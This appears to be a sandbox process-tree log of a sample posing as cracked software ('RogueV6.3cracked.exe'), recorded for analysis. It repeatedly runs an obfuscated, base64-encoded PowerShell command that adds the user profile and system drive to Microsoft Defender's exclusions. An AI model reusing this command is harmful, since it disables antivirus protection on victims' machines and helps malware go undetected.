C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="120⤵PID:7272
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"120⤵PID:8868
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"120⤵PID:6372
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="121⤵PID:8724
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"121⤵PID:8744
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"121⤵PID:1004
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="122⤵PID:440
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-